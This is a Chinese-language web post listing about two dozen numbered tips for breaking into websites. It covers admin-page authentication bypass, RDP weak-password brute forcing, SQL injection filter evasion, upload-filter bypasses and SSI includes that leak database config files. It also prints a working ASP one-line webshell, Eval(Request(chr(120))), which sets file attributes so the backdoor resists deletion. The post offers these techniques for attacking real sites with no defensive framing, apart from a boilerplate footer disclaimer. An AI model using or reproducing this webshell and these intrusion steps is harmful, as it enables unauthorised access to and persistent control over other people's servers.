总结16种⽹站渗透技巧经验分享
1.利⽤⽹站过滤不严直接绕过后台验证,在⽹站后⾯加上 admin/session.asp 或 admin/left.asp
2.有的⽹站进后台会出现⼀个脚本提⽰框,输⼊:administrator 即可突破!因为admin代表以管理员⾝份进⼊的意思。
3.有的⽹站开了3389,⼊侵之前先去连接3389,尝试弱⼝令或是爆破,再者就是按5次shift键,看看有没前⼈装过后门,然后再社⼯密码。
4.有时候进后台会弹出提⽰框“请登陆”,把地址抄写出来(复制不了),然后放在⽹页源代码分析器⾥,选择浏览器-拦截跳转勾选–查看即可进⼊后台!
6.突破⼀流信息监控拦截系统访问,当⼩马可以访问,上传⼤马却不⾏的时候,可以先⽤⼤马跟⼀张图⽚合并,在上传合并后的图⽚,接着数据库备份后访问即可!
7.在拿编辑器的shell时,有时增加了asp|asa|cer|php|aspx等扩展名上传时都被过滤了,其实只要增加aaspsp 上传asp就会突破了。
8.有时啊D猜出表段了,但是猜不到字段的时候,可以到后台查看源⽂件,搜索ID或type,⼀般都能到,再到啊D⾥添加字段进⾏猜解内容即可突破。
9.社⼯后台密码可以⽤这个技巧,假如⽹站域名是:www.baidu 管理员名称为admin,可以试试密码“baidu”和“baidu”来登陆。
10.⼿⼯注⼊时如果⽹站过滤了 and 1=1  and 1=2 ,可以⽤xor 1=1  xor 1=2 进⾏判断。
11.本地构造上传⼀句话⽊马,如果提⽰“请先选择你要上传的⽂件![ 重新上传 ]” ,说明⽂件太⼩了,⽤记事本打开再复制多⼏句话从⽽扩⼤⽂件⼤⼩,再上传即可。
12.⽤啊d跑表,跑字段名name和pass出不来,显⽰长度超过50什么的,猜解不出的情况下,这时放在穿⼭甲去跑⼀般都能跑出来!
13.猜管理员后台⼩技巧,admin/left.asp、admin/main.asp、admin/top.asp、admin/admin.asp 会现出菜单导航,然后迅雷下载全部链接。
14.知道表名,字段,使⽤SQL语句在ACCESS数据库中加个⽤户名及密码语句:Insert into admin(user,pwd) values(‘test’,’test’)
15.当获得管理员密码,却拿不到管理员的帐号时,到前台随便打开⼀个新闻,诸如“提交者”“发布者”之类的字眼,⼀般“提交者”就是管理员的帐号了。
17.源码的利⽤,很多⽹站⽤的都是⽹上下载的源码,有的站长很懒,什么也不改,然后就上传开通⽹站了,我们可以去下载⼀套,⾥⾯有很多默认的信息值得利⽤。
18.把以下代码上传到webshell⾥,后缀是asp,就算别⼈发现了也删除不了,算是超级防删的⼀句话⽊马了,可以很安全的留个后门,菜⼑连接密码:x
<%Eval(Request(chr(120))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes <> 39 then:f.attributes = 39:end if%> 
19.当破解出帐号密码却不到后台的时候,可以尝试链接ftp,假如域名是:www.baidu “ 得到的密码为“bishi”,我们就可以试下⽤“xxxx”“xxxx”作为FTP ⽤户名,⽤“bishi”:作为FTP密码来进⾏登陆,成功的⼏率可以很⼤的哦!ftp的默认端⼝:21  默认帐号密码:test
20.有的后台不显⽰验证码,难道就没法登录了么? 其实把⼀段代码导⼊注册表⾥就可以突破这个困境了,把下⾯的代码保存为,双击导⼊就可以了!REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000
21.当⽹站不允许上传 asp、asa、php等⽂件时,我们可以上传⼀个stm⽂件,代码为“<!–#include file=”conn.asp”–>”
有没有什么网站分享源码(想查看什么⽂件就写什么⽂件名,这⾥我假设想查看“conn.asp”),然后直接打开这个stm⽂件的地址,再查看源代码,“conn.asp”这个⽂件的代码就⼀览⽆遗了!22.当⽹站不允许上传ASP,CGI,CER,CDX,HTR等类型的⽂件时,尝试上传⼀个shtm⽂件,内容为:<!–#includ file=”conn.asp”–>
如果上传成功,那太好了,访问地址就可以浏览conn.asp⾥的内容了,这样⼀来,数据库路径也就到⼿啦!
24.旁注的话,肯定是挑⽀持aspx的站点来⽇了,问题是怎样判断呢?⽅法很简单,在在⽹站后⾯加上xxx.aspx,如果返回“/”应⽤程序中的服务器错误,⽆法到该资源,404画⾯就说明⽀持aspx⽊马。
25.⽹站后⾯加test.php 可以查看版本
26.禁忌这两个⽹站后台⽂件 admin_index.asp  manage_login.asp

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。